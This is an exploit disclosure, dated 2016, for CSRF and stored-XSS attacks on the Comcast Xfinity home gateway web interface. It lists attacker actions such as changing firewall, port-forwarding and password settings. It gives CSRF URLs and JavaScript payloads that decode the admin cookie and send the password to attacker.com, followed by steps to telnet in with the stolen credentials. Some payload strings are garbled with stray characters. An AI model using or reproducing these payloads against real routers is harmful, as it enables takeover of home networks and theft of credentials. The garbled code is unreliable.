EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY AUTHOR: Pabstersac DATE: 1ST OF AUGUST 2016 CVE: N/A CATEGORY: REMOTE CONTACT: pabstersac@gmail.com IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME. CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE. VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED. 1) ADD BLOCKED SITE 2) ADD BLOCKED KEYWORD 3) REMOVE BLOCKED SITE OR KEYWORD 4) TRUST/UNTRUST DEVICES 5) DISABLE/ENABLE MANAGED SITES 6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;) 7) DELETE MANAGED SERVICE http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1 8) DISABLE/ENABLE MANAGED SERVICES 9) UNBLOCK DEVICE http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2 10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;) 11) ENABLE/DISABLE MANAGED DEVICES 12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;) 13) DELETE A PORT FORWARDING SERVICE http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5 14) EDIT EXISTING PORT FORWARDING SERVICES 15) ENABLE/DISABLE PORT FORWARDING Iall ignore port triggering cuz idc about port triggering . . . 16) CHANGE REMOTE MANAGEMENT SERVICE 17) CHANGE FIREWALL SETTINGS 18) CHANGE PASSWORD PoC UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js ) CONTENTS ARE: document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": atestpassword123a, "oldPassworda: aa+ l+aa}a); SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj) CREATE HTML FILE : I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL 19) GET PASSWORD PoC UPLOAD test1.js TO yourjavascript.com CONTENTS ARE: document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": atestpassword123a, "oldPassworda: aa+ l+aa}a); SHORTEN URL ON GOOGLE CREATE HTML FILE : I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL 20) ACCESS DEVICES IN THE NETWORK 21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE: THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT. FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT. IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.